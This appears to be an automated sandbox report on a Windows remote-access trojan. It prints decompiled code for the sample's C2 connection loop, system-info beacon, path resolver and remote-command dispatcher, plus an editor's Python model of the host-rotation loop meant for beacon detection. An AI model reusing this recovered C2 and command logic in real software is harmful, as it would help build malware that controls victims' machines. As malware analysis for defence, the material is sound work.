                    				void* _t237;
                    				intOrPtr* _t238;
                    				void* _t241;
                    				void* _t242;
                    				void* _t243;
                    				void* _t246;
                    				void* _t248;
                    				void* _t250;
                    				void* _t251;
                    				void* _t252;
                    				void* _t253;
                    				void* _t254;
                    				void* _t256;
                    				void* _t257;
                    				void* _t258;
                    				intOrPtr* _t353;
                    				void* _t367;
                    				void* _t369;
                    				void* _t371;
                    				void* _t373;
                    				void* _t375;
                    				long _t379;
                    				void* _t380;
                    				void* _t381;
                    				char* _t401;
                    				void* _t616;
                    				void* _t625;
                    				void* _t677;
                    				signed short _t681;
                    				struct _SECURITY_ATTRIBUTES* _t684;
                    				void* _t694;
                    				void* _t695;
                    				void* _t696;
                    				void* _t697;
                    				void* _t698;
                    				void* _t699;
                    				void* _t700;
                    				void* _t701;
                    				void* _t703;
                    				void* _t704;
                    				void* _t708;
                    				void* _t709;
                    				void* _t710;
                    				void* _t711;
                    				void* _t712;
                    				long _t714;
                    
                    				_push(_t380);
                    				E004020D5(_t380,  &_v104);
                    				E00416FDC( &_v236, _t616);
                    				E004020D5(_t380,  &_v1436);
                    				_t677 = 0x46c578;
                    				_t166 = E00436769(_t164, E00401F95(E00401E49(0x46c578, _t616, _t712, 0x29)));
                    				if(_t166 != 0) {
                    					_t379 = _t166 * 0x3e8;
                    					_t714 = _t379;
                    					Sleep(_t379);
                    				}
                    				_t695 = _t694 - 0x18;
                    				E00402084(_t380, _t695, 0x4657ec);
                    				_t168 = E00401E49(_t677, _t616, _t714, 0);
                    				_t696 = _t695 - 0x18;
                    				E004020EC(_t380, _t696, _t616, _t714, _t168);
                    				E00417478( &_v32, _t616);
                    				_t697 = _t696 + 0x30;
                    				_t684 = 0;
                    				_v8 = 0;
                    				_t381 = 0;
                    				E00401E49(_t677, _t616, _t714, 0x3a);
                    				_t617 = 0x45f6bc;
                    				_t172 = E0040EAD9(_t714);
                    				_t715 = _t172;
                    				if(_t172 != 0) {
                    					E00401E49(_t677, 0x45f6bc, _t715, 0x3a);
                    					_t367 = E00402489();
                    					_t369 = E00401F95(E00401E49(_t677, 0x45f6bc, _t715, 0x3a));
                    					E00401E49(_t677, 0x45f6bc, _t715, 0x39);
                    					_t371 = E00402489();
                    					_t373 = E00401F95(E00401E49(_t677, _t617, _t715, 0x39));
                    					E00401E49(_t677, _t617, _t715, 0x38);
                    					_t375 = E00402489();
                    					E00401F95(E00401E49(_t677, _t617, _t715, 0x38));
                    					_t617 = _t375;
                    					E00404882(_t375, _t373, _t371, _t369, _t367); // executed
                    					_t697 = _t697 + 0x10;
                    					_t684 = 0;
                    				}
                    				L4:
                    				_t698 = _t697 - 0x18;
                    				E00402084(_t381, _t698, 0x4657f0);
                    				_t174 = E00401E49( &_v32, _t617, _t715, _t381);
                    				_t699 = _t698 - 0x18;
                    				E004020EC(_t381, _t699, _t617, _t715, _t174);
                    				E00417478( &_v20, _t617);
                    				_t697 = _t699 + 0x30;
                    				E00401E49( &_v20, _t617, _t715, 2);
                    				_t618 = "0";
                    				_t178 = E00405A6F("0");
                    				asm("sbb al, al");
                    				 *0x46bae0 =  ~_t178 + 1;
                    				E0040498B(0x46c780);
                    				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
                    					_t718 =  *0x46c781 - 1;
                    					_t401 =  &_v104;
                    					if( *0x46c781 != 1) {
                    						_push(0x45f6bc);
                    					} else {
                    						_push(" (TLS)");
                    					}
                    					E00405A0B(_t381, _t401);
                    					_t700 = _t697 - 0x18;
                    					_t184 = E00401E49( &_v20, _t618, _t718, 1);
                    					_t617 = E00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, E004075E6( &_v80, "Connecting to ", _t718, E00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
                    					E00402F93(_t381, _t700, _t188, _t718,  &_v104);
                    					_t701 = _t700 - 0x14;
                    					E00402084(_t381, _t701, "[Info]");
                    					E00416C80(_t381, _t677);
                    					_t697 = _t701 + 0x30;
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					_t684 = _v8;
                    				}
                    				_t195 = 2;
                    				 *0x46bacc = _t195;
                    				_t197 = E00401F95(E00401E49( &_v20, _t617, _t718, 0));
                    				__imp__#52(_t197); // executed
                    				_t719 = _t197;
                    				if(_t197 != 0) {
                    					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
                    					_t209 = E00436769(_t207, E00401F95(E00401E49( &_v20, _t617, _t719, 1)));
                    					__imp__#9();
                    					_t697 = _t697 + 0xc - 0x10;
                    					 *0x46bace = _t209;
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					_t210 = E00404A08(_t617, _t209); // executed
                    					_t720 = _t210;
                    					if(_t210 != 0) {
                    						_t703 = _t697 - 0x18;
                    						_t212 = E00401E49( &_v20, _t617, _t720, 1);
                    						_t625 = E00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, E004075E6( &_v212, "Connected to  ", _t720, E00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
                    						E00402F93(_t381, _t703, _t625, _t720,  &_v104);
                    						_t704 = _t703 - 0x14;
                    						E00402084(_t381, _t704, "[Info]");
                    						E00416C80(_t381, 0x46c780);
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00404E9A(0x46c780, 0xa, 0); // executed
                    						_v164 = 0;
                    						asm("stosd");
                    						_v8 = 1;
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd"); // executed
                    						_t225 = E00416EFA(0x46c780); // executed
                    						_push(_t625);
                    						E00411912( &_v164, "%I64u", _t225);
                    						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
                    						E0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
                    						E004020EC(_t381,  &_v80, _t625, _t720, E00401E49(0x46c578, _t625, _t720, 1));
                    						_t233 = E00402489();
                    						_t234 = E00401F95(0x46c560);
                    						_t237 = E00410A30(E00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233); // executed
                    						_t708 = _t704 + 0x60;
                    						if(_t237 != 0) {
                    							E00405A0B(_t381,  &_v80,  &_v2436);
                    						}
                    						_t238 =  *0x46bd44; // 0x0
                    						_t681 = 0;
                    						_t722 = _t238;
                    						if(_t238 != 0) {
                    							_t681 =  *_t238() & 0x0000ffff;
                    						}
                    						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\DpiScaling.exe");
                    						_t709 = _t708 - 0x18;
                    						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
                    						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
                    						_t243 = E00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
                    						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
                    						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
                    						_t250 = E0041719C( &_v1316); // executed
                    						_t251 = E0041739C(_t381,  &_v1292, _t250);
                    						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
                    						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
                    						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
                    						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
                    						_t257 = E0040D1E5( &_v1172);
                    						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
                    						_t617 = E00402F93(_t381,  &_v212, E00402F93(_t381,  &_v188, E00402F93(_t381,  &_v260, E00402F1D( &_v284, E00402F93(_t381,  &_v308, E00402F1D( &_v332, E00402F93(_t381,  &_v356, E00402F93(_t381,  &_v380, E00402F93(_t381,  &_v404, E00402F93(_t381,  &_v428, E00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, E00402F93(_t381,  &_v500, E00402F1D( &_v524, E00402F93(_t381,  &_v548, E00402F1D( &_v572, E00402F93(_t381,  &_v596, E0040759C(_t381,  &_v620, E00402F93(_t381,  &_v644, E00402F1D( &_v668, E00402F93(_t381,  &_v692, E00402F1D( &_v716, E00402F93(_t381,  &_v740, E00402F1D( &_v764, E00402F93(_t381,  &_v788, E00402F1D( &_v812, E00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, E00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, E00402F93(_t381,  &_v932, E00402F1D( &_v956, E00402F93(_t381,  &_v980, E00402F93(_t381,  &_v1004, E00402F93(_t381,  &_v1028, E00402F1D( &_v1052, E00402F93(_t381,  &_v1076, E00402F1D( &_v1100, E00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Sept-AITAB5"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
                    						E00402F93(_t381, _t709, _t297, _t722, "Exe");
                    						_push(0x4b);
                    						E00404AA4(_t381, 0x46c780, _t297, _t722); // executed
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401EF0();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401FC7();
                    						E00401EF0();
                    						E00404BBE(0x46c780, _t297, E004123B9, 1);
                    						_t353 =  *0x46bd48; // 0x0
                    						if(_t353 != 0 &&  *0x46bd4d != 0) {
                    							_t353 =  *_t353();
                    							 *0x46bd4d = 0;
                    						}
                    						if( *0x46c39a != 0) {
                    							_t353 = E0040951E(_t381, 0x46c350);
                    						}
                    						E004059C5(_t353);
                    						_t710 = _t709 - 0x18;
                    						E00402084(_t381, _t710, "Disconnected!");
                    						_t711 = _t710 - 0x18;
                    						E00402084(_t381, _t711, "[Info]");
                    						E00416C80(_t381, 0x46c238);
                    						_t697 = _t711 + 0x30;
                    						if( *0x46bea4 != 0) {
                    							CreateThread(0, 0, E0041667F, 0, 0, 0);
                    						}
                    						E00401FC7();
                    						E00401EF0();
                    					}
                    					_t684 = _v8;
                    					_t677 = 0x46c578;
                    				}
                    				_t684 = _t684 - 1;
                    				_v8 = _t684;
                    				_t381 = _t381 + 1;
                    				_t198 = E004021F5( &_v32);
                    				_t728 = _t381 - _t198;
                    				if(_t381 >= _t198) {
                    					_t200 = 2;
                    					_t381 = 0;
                    					_t204 = E00436769(_t201, E00401F95(E00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
                    					_t715 = _t204;
                    					Sleep(_t204);
                    				}
                    				E00401E74( &_v20, _t617);
                    				goto L4;
                    			}

                    APIs
                    • Sleep.KERNEL32(00000000,00000029,73B743E0,0046C578,00000000), ref: 0041197A
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                    • gethostbyname.WS2_32(00000000), ref: 00411B6B
                    • htons.WS2_32(00000000), ref: 00411BA9
                    • Sleep.KERNEL32(00000000,00000002), ref: 004123A6
                      • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                      • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                      • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                    • GetTickCount.KERNEL32 ref: 00411DA2
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    • CreateThread.KERNEL32(00000000,00000000,Function_0001667F,00000000,00000000,00000000), ref: 00412355
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                    • String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\DpiScaling.exe$Connected to $Connecting to $Disconnected!$Exe$Sept-AITAB5$[Info]$name
                    • API String ID: 2130001850-3324633824
                    • Opcode ID: aac4903dc12f3f0f4b876898df669f584e53baf1360f70ef9831274f7dbc6615
                    • Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
                    • Opcode Fuzzy Hash: aac4903dc12f3f0f4b876898df669f584e53baf1360f70ef9831274f7dbc6615
                    • Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89
                    Uniqueness

                    Uniqueness Score: -1.00%
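                    Editor's worked example (added here; not code from the sample, from Joe Sandbox or from the Remcos project): the function above walks its host list in order, logs "Connecting to host:port[ (TLS)]", resolves and connects, and after a session ends (or an attempt fails) moves straight to the next entry; it sleeps once up front (Sleep(config[0x29] * 1000)) and then only after the whole list has been tried (Sleep(config[2] * 1000)). The model below replays that control flow on a virtual clock so an analyst can see the beacon cadence it produces. The ";" and ":" separators stand in for the two unrecovered separator strings (0x4657ec, 0x4657f0); reading the third field, which the decompile compares against "0", as the TLS flag is an assumption based on the " (TLS)" log suffix; connect() is a stand-in for gethostbyname/htons/connect and the session that follows.

```python
"""Model of the C2 host-rotation loop recovered in the decompile above.

Constructed by the editor for illustration; it reproduces the control flow
(initial Sleep, walk the list, Sleep again only once the list is exhausted),
not the sample's networking. Field and host separators are assumptions.
"""
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class Endpoint:
    host: str
    port: int
    tls: bool


def parse_hosts(entry: str, host_sep: str = ";", field_sep: str = ":") -> List[Endpoint]:
    """Split a host-list config entry into endpoints.

    The decompile splits the entry on one unrecovered separator (0x4657ec) and
    each item on another (0x4657f0), then compares the third field with "0".
    ";" and ":" are placeholders for those separators; the third field is read
    as the TLS flag, matching the " (TLS)" suffix in the connect log message.
    """
    endpoints: List[Endpoint] = []
    for item in filter(None, entry.split(host_sep)):
        fields = item.split(field_sep)
        if len(fields) < 2 or not fields[1].isdigit():
            raise ValueError(f"malformed host entry: {item!r}")
        tls = len(fields) > 2 and fields[2] != "0"
        endpoints.append(Endpoint(fields[0], int(fields[1]), tls))
    if not endpoints:
        raise ValueError("empty host list")
    return endpoints


Event = Tuple[float, str, Endpoint]


def simulate_rotation(
    endpoints: List[Endpoint],
    initial_delay_s: float,
    retry_delay_s: float,
    connect: Callable[[Endpoint], Optional[float]],
    max_events: int,
) -> List[Event]:
    """Replay the loop on a virtual clock (seconds).

    connect(ep) stands in for gethostbyname/htons/connect plus the session
    that follows: it returns the session length in seconds, or None when the
    attempt fails. Mirrors the decompile: Sleep(cfg[0x29]*1000) once up front,
    no pause between hosts, Sleep(cfg[2]*1000) only after the last host.
    """
    clock = float(initial_delay_s)
    events: List[Event] = []
    idx = 0
    while len(events) < max_events:
        ep = endpoints[idx]
        events.append((clock, "connecting", ep))
        session = connect(ep)
        if session is not None:
            events.append((clock, "connected", ep))
            clock += session
            events.append((clock, "disconnected", ep))
        idx += 1
        if idx >= len(endpoints):
            idx = 0
            clock += retry_delay_s
    return events[:max_events]


def attempt_gaps(events: List[Event], host: str) -> List[float]:
    """Seconds between successive connection attempts to one host. With every
    host failing this is exactly retry_delay_s, with no jitter."""
    times = [t for t, kind, ep in events if kind == "connecting" and ep.host == host]
    return [b - a for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    # Constructed host list; the names are placeholders, not from the sample.
    eps = parse_hosts("c2-a.example.invalid:2404:0;c2-b.example.invalid:443:1")
    for t, kind, ep in simulate_rotation(eps, 5, 10, lambda ep: None, 6):
        suffix = " (TLS)" if ep.tls else ""
        print(f"t={t:6.1f}s {kind:12s} {ep.host}:{ep.port}{suffix}")
```

                    Because the only pause is the fixed retry delay after the last host, a fully failing list produces attempts to each host at exact multiples of config[2] seconds, which is the signal a beaconing detector on proxy or firewall logs can key on.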

                    C-Code - Quality: 84%
                    			E0041805B(void* __ecx, void* __edx, intOrPtr _a4) {
                    				char _v524;
                    				char _v544;
                    				char _v560;
                    				char _v572;
                    				void* _v576;
                    				char _v580;
                    				char _v584;
                    				char _v600;
                    				char _v608;
                    				char _v616;
                    				char _v620;
                    				void* _v624;
                    				char _v628;
                    				char _v632;
                    				char _v636;
                    				char _v644;
                    				void* _v648;
                    				char _v652;
                    				void* _v672;
                    				void* __ebx;
                    				signed int _t36;
                    				void* _t39;
                    				void* _t40;
                    				void* _t77;
                    
                    				_t73 = __edx;
                    				_t77 = __ecx;
                    				_t54 = __edx;
                    				E00401F6D(__edx,  &_v644);
                    				_t36 = __edx + 0xffffffd0;
                    				_t85 = _t36 - 7;
                    				if(_t36 <= 7) {
                    					switch( *((intOrPtr*)(_t36 * 4 +  &M00418237))) {
                    						case 0:
                    							_push(L"Temp");
                    							goto L14;
                    						case 1:
                    							__ecx =  &_v620;
                    							__eax = E00416D45(__ebx,  &_v620);
                    							__ecx =  &_v644;
                    							__eax = E00401EFA( &_v644, __edx, __esi, __eax);
                    							goto L4;
                    						case 2:
                    							_push(L"SystemDrive");
                    							goto L14;
                    						case 3:
                    							_push(L"WinDir");
                    							goto L14;
                    						case 4:
                    							__eax = E00417614(__ecx);
                    							__eflags = __al;
                    							if(__eflags != 0) {
                    								__ecx =  &_v620;
                    								E0040427F(__ebx, __ecx, L"\\SysWOW64") = E0043987F(__ebx, __ecx, __eflags, L"WinDir");
                    								__ecx =  &_v600;
                    								__edx = __eax;
                    								__ecx =  &_v580;
                    								__eax = E00403030( &_v580, __edx, __eax);
                    								__ecx =  &_v652;
                    								__eax = E00401EFA( &_v652, __edx, __esi, __eax);
                    								__ecx =  &_v584;
                    								__eax = E00401EF0();
                    								__ecx =  &_v608;
                    								__eax = E00401EF0();
                    								L4:
                    								__ecx =  &_v620;
                    								goto L5;
                    							} else {
                    								__ecx =  &_v572;
                    								E0040427F(__ebx, __ecx, L"\\system32") = E0043987F(__ebx, __ecx, __eflags, L"WinDir");
                    								__ecx =  &_v600;
                    								__edx = __eax;
                    								__ecx =  &_v628;
                    								__eax = E00403030( &_v628, __edx, __eax);
                    								__ecx =  &_v652;
                    								__eax = E00401EFA( &_v652, __edx, __esi, __eax);
                    								__ecx =  &_v632;
                    								__eax = E00401EF0();
                    								__ecx =  &_v608;
                    								__eax = E00401EF0();
                    								__ecx =  &_v584;
                    								L5:
                    								__eax = E00401EF0();
                    								goto L15;
                    							}
                    							L16:
                    						case 5:
                    							_push(L"ProgramFiles");
                    							goto L14;
                    						case 6:
                    							_push(L"AppData");
                    							goto L14;
                    						case 7:
                    							_push(L"UserProfile"); // executed
                    							L14:
                    							_t51 = E0043987F(_t54, _t57, _t85); // executed
                    							E00409DC9(_t54,  &_v644, _t51);
                    							goto L15;
                    					}
                    				}
                    				L15:
                    				__imp__GetLongPathNameW(E00401EEB( &_v644),  &_v524, 0x208); // executed
                    				_t39 = E0040427F(_t54,  &_v560, _a4);
                    				_t40 = E0040427F(_t54,  &_v636, "\\");
                    				E00403030(_t77, E00403030( &_v600, E004183F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				return _t77;
                    				goto L16;
                    			}


                    APIs
                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                    • API String ID: 82841172-1609423294
                    • Opcode ID: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
                    • Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
                    • Opcode Fuzzy Hash: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
                    • Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E004123B9(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a36, intOrPtr _a37, intOrPtr _a41, intOrPtr _a47, char _a61) {
                    				char _v116;
                    				char _v120;
                    				char _v140;
                    				char _v156;
                    				char _v164;
                    				void* _v172;
                    				char _v192;
                    				void* _v196;
                    				char _v212;
                    				char _v216;
                    				void* _v220;
                    				char _v240;
                    				void* _v244;
                    				char _v252;
                    				char _v264;
                    				void* _v268;
                    				void* _v284;
                    				char _v288;
                    				void* _v292;
                    				char _v304;
                    				char _v308;
                    				char _v312;
                    				char _v336;
                    				char _v340;
                    				char _v344;
                    				char _v348;
                    				char _v364;
                    				char _v368;
                    				long _v372;
                    				int _v376;
                    				char _v396;
                    				char _v400;
                    				void* _v404;
                    				int _v408;
                    				char _v412;
                    				char _v416;
                    				char _v420;
                    				char _v424;
                    				char _v428;
                    				char _v432;
                    				char _v436;
                    				char _v440;
                    				char _v444;
                    				char _v452;
                    				char _v500;
                    				char _v504;
                    				void* __esi;
                    				void* _t244;
                    				void* _t246;
                    				intOrPtr _t374;
                    				intOrPtr _t375;
                    				void* _t376;
                    				void* _t378;
                    				signed int _t379;
                    				signed int _t385;
                    				void* _t388;
                    				void* _t389;
                    				void* _t390;
                    				void* _t394;
                    				void* _t400;
                    
                    				_t399 = __eflags;
                    				_t360 = __edx;
                    				_t294 = __ebx;
                    				_push(__ebx);
                    				_t374 = _a4;
                    				E004020EC(__ebx,  &_v308, __edx, __eflags, _t374 + 0x1c);
                    				SetEvent( *(_t374 + 0x34));
                    				_t375 =  *((intOrPtr*)(E00401F95( &_v312)));
                    				E004042A6( &_v312,  &_v288, 4, 0xffffffff);
                    				_t388 = (_t385 & 0xfffffff8) - 0x18c;
                    				E004020EC(__ebx, _t388, _t360, _t399, 0x46c238);
                    				_t389 = _t388 - 0x18;
                    				E004020EC(__ebx, _t389, _t360, _t399,  &_v304);
                    				E00417478( &_v444, _t360);
                    				_t390 = _t389 + 0x30;
                    				_t400 = _t375 - 0x8f;
                    				if(_t400 > 0) {
                    					_t376 = _t375 + 0xffffff70;
                    					__eflags = _t376 - 0x22;
                    					if(__eflags <= 0) {
                    						switch( *((intOrPtr*)(( *(_t376 + 0x413511) & 0x000000ff) * 4 +  &M004134C5))) {
                    							case 0:
                    								__ecx =  &_v420;
                    								__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    								__eax = E00401F95(__ecx);
                    								__ecx = __eax;
                    								__eax = E00407F83(__ecx);
                    								goto L126;
                    							case 1:
                    								__ecx =  &_v420;
                    								__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    								__eax = E00401F95(__eax);
                    								__eax = StrToIntA(__eax);
                    								__ecx =  &_v424;
                    								__edi = __eax;
                    								__ecx = E00401E49( &_v424, __edx, __eflags, 1);
                    								__eax = E00401F95(__eax);
                    								__dl = 0x30;
                    								__ecx =  &_v408;
                    								__eax = E0041805B( &_v408, __edx, __eax);
                    								__ecx =  &_v408;
                    								__eax = E00401EEB( &_v408);
                    								__ecx =  &_v428;
                    								__esi = __eax;
                    								__eax = E00401E49( &_v428, __edx, __eflags, 2);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx = __esi;
                    								__eax = E00417A4E(__esi);
                    								__esp = __esp + 0x18;
                    								__ecx =  &_v416;
                    								__edx = E00401EEB( &_v416);
                    								__ecx = __edi;
                    								__eax = E00417F10(__edi, __edx);
                    								goto L106;
                    							case 2:
                    								__ecx =  &_v420;
                    								__ecx = E00401E49( &_v420, __edx, __eflags, 1);
                    								__eax = E00401F95(__eax);
                    								__ecx =  &_v424;
                    								__ecx = E00401E49( &_v424, __edx, __eflags, 0);
                    								__eax = E00401F95(__ecx);
                    								__eax = SetWindowTextW(__eax, __eax);
                    								goto L20;
                    							case 3:
                    								__ecx =  &_v420;
                    								__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00413545(__ebx, __edx);
                    								goto L103;
                    							case 4:
                    								__ecx =  &_v420;
                    								__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00413673(__ecx, __eflags);
                    								goto L103;
                    							case 5:
                    								E004020EC(__ebx, _t390 - 0x18, _t360, __eflags, E00401E49( &_v420, _t360, __eflags, 0));
                    								E0040691F(_t360);
                    								goto L103;
                    							case 6:
                    								__ecx =  &_v420;
                    								__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00415397(__edx);
                    								goto L103;
                    							case 7:
                    								__ecx =  &_v420;
                    								__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00404013(__edx);
                    								goto L103;
                    							case 8:
                    								__eax = E0041667F(__ebx);
                    								goto L126;
                    							case 9:
                    								__eax = E004167AD(__ebx, __eflags);
                    								goto L126;
                    							case 0xa:
                    								__eax = E004167EA(__eax);
                    								goto L126;
                    							case 0xb:
                    								__ebx = 0;
                    								__ecx =  &_v420;
                    								__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    								__eax = E00405220(0);
                    								__ecx =  &_v428;
                    								__eflags =  *__eax - __bl;
                    								__ebx = 0 | __eflags != 0x00000000;
                    								__eax = E00401E49( &_v428, __edx, __eflags, 1);
                    								__dl = __bl;
                    								__ecx = __eax;
                    								__eax = E0041678C(__ecx, __edx, __edi, __esi);
                    								goto L126;
                    							case 0xc:
                    								__eax = E004167F2(__edx);
                    								goto L126;
                    							case 0xd:
                    								__eax = E00405F77(__ebx, __ecx, __edx);
                    								__ecx =  &_v420;
                    								__esi = __eax;
                    								__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx =  &_v340;
                    								__edi = __esp;
                    								__edx = __esi;
                    								__edx = E00417226(__ebx,  &_v340, __esi);
                    								__ecx =  &_v372;
                    								__edx = __eax;
                    								__ecx = __edi;
                    								__eax = E00402F93(__ebx, __edi, __edx, __eflags, __eax);
                    								_push(0xab);
                    								goto L125;
                    							case 0xe:
                    								__eflags =  *0x46bb03;
                    								if( *0x46bb03 != 0) {
                    									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);
                    								} else {
                    									__cl = 1;
                    									__eax = E00418F59(__ebx, __ecx, __edx);
                    									__ebx = 0;
                    									__eax = CreateThread(0, 0, E00418D28, 0, 0, 0);
                    									 *0x46bb03 = 2;
                    								}
                    								goto L126;
                    							case 0xf:
                    								_push(5);
                    								goto L16;
                    							case 0x10:
                    								__ebx = 0;
                    								_push(0);
                    								_push(0);
                    								goto L17;
                    							case 0x11:
                    								__ecx =  &_v116;
                    								__eax = E004072F6( &_v116);
                    								__ecx =  &_v420;
                    								__eax = E00401E49( &_v420, __edx, __eflags, 2);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx =  &_v428;
                    								__eax = E00401E49( &_v428, __edx, __eflags, 1);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx =  &_v436;
                    								__eax = E00401E49( &_v436, __edx, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx =  &_v140;
                    								__eax = E00405BD3( &_v140, __edx);
                    								__ecx =  &_v212;
                    								__eax = L00407304(__ebx, __ecx, __esi);
                    								goto L126;
                    							case 0x12:
                    								goto L126;
                    						}
                    					}
                    					goto L126;
                    				} else {
                    					if(_t400 == 0) {
